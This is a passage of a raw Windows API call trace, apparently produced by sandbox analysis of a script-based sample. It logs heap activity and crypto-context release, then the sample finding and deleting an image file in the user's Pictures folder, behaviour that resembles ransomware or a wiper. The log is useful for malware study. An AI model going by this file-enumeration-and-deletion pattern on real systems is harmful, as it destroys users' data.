HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0256.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0256.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0256.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0256.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0256.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0256.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0256.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0256.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0256.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0256.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0256.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0256.813] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0256.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0256.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0256.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0256.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0256.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0256.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0256.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0256.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0256.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0256.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0256.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0256.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0256.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0256.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0256.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0256.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0256.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0256.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0256.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0256.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0256.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0256.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0256.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0256.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0256.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0256.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0256.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0256.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0256.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0256.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0256.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69ac8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0256.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0256.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0256.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0256.814] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0256.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0256.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0256.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0256.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0256.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0256.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0256.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0256.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0256.815] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0256.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0256.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51568 [0256.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0256.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0256.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0256.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0256.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0256.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0256.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0256.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0256.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0256.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0256.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0256.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0256.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0256.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0256.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0256.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0256.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0256.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0256.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0256.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0256.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0256.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0256.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0256.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0256.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0256.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0256.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0256.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0256.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0256.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0256.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0256.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0256.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0256.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0256.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0256.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0256.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0256.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0256.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0256.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0256.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0256.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0256.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0256.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0256.816] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0256.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0256.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0256.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0256.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56098 [0256.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0256.817] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0256.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56098 | out: hHeap=0x970000) returned 1 [0256.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0256.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51448 [0256.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0256.817] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0256.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0256.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0256.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0256.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0256.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0256.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0256.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0256.817] FreeLibrary (hLibModule=0x756e0000) returned 1 [0256.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0256.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0256.817] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0256.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0256.817] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0256.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0256.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0256.817] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0256.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0256.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0256.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0256.818] CloseHandle (hObject=0x2d0) returned 1 [0256.819] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0256.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0256.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0256.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0256.819] CloseHandle (hObject=0x2a0) returned 1 [0256.825] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0256.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0256.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0256.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0256.828] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0256.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0256.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0256.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0256.828] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0256.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0256.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0256.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0256.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0256.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0256.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0256.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0256.829] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/yuOTM-ydpavUWyQnpT.gif", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\yuOTM-ydpavUWyQnpT.gif", lpFilePart=0x8cedf4*="yuOTM-ydpavUWyQnpT.gif") returned 0x2f [0256.829] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\yuOTM-ydpavUWyQnpT.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\yuotm-ydpavuwyqnpt.gif")) returned 0x20 [0256.829] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\yuOTM-ydpavUWyQnpT.gif", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe435730, ftCreationTime.dwHighDateTime=0x1d5e8ad, ftLastAccessTime.dwLowDateTime=0x2a789f0, ftLastAccessTime.dwHighDateTime=0x1d5eb46, ftLastWriteTime.dwLowDateTime=0x2a789f0, ftLastWriteTime.dwHighDateTime=0x1d5eb46, nFileSizeHigh=0x0, nFileSizeLow=0x11daa, dwReserved0=0x1, dwReserved1=0x1c, cFileName="yuOTM-ydpavUWyQnpT.gif", cAlternateFileName="YUOTM-~1.GIF")) returned 0xa87050 [0256.829] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\yuOTM-ydpavUWyQnpT.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\yuotm-ydpavuwyqnpt.gif")) returned 1 [0257.034] FindNextFileW (in: hFindFile=0xa87050, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe435730, ftCreationTime.dwHighDateTime=0x1d5e8ad, ftLastAccessTime.dwLowDateTime=0x2a789f0, ftLastAccessTime.dwHighDateTime=0x1d5eb46, ftLastWriteTime.dwLowDateTime=0x2a789f0, ftLastWriteTime.dwHighDateTime=0x1d5eb46, nFileSizeHigh=0x0, nFileSizeLow=0x11daa, dwReserved0=0x1, dwReserved1=0x1c, cFileName="yuOTM-ydpavUWyQnpT.gif", cAlternateFileName="YUOTM-~1.GIF")) returned 0 [0257.034] FindClose (in: hFindFile=0xa87050 | out: hFindFile=0xa87050) returned 1 [0257.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0257.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0257.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0257.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0257.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0257.035] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0257.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0257.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0257.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0257.035] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0257.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0257.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0257.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0257.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0257.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0257.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0257.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0257.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0257.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0257.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0257.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0257.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0257.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0257.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0257.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0257.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0257.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0257.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0257.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0257.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0257.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0257.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e58910 [0257.036] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/yuOTM-ydpavUWyQnpT.gif", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\yuOTM-ydpavUWyQnpT.gif", lpFilePart=0x8cf650*="yuOTM-ydpavUWyQnpT.gif") returned 0x2f [0257.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0257.036] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\yuOTM-ydpavUWyQnpT.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\yuotm-ydpavuwyqnpt.gif")) returned 0xffffffff [0257.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0257.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0257.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0257.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0257.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0257.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0257.036] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0257.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0257.036] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0257.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0257.036] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0257.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0257.036] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0257.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0257.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f10 [0257.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0257.036] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0257.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f10 | out: hHeap=0x970000) returned 1 [0257.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0257.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 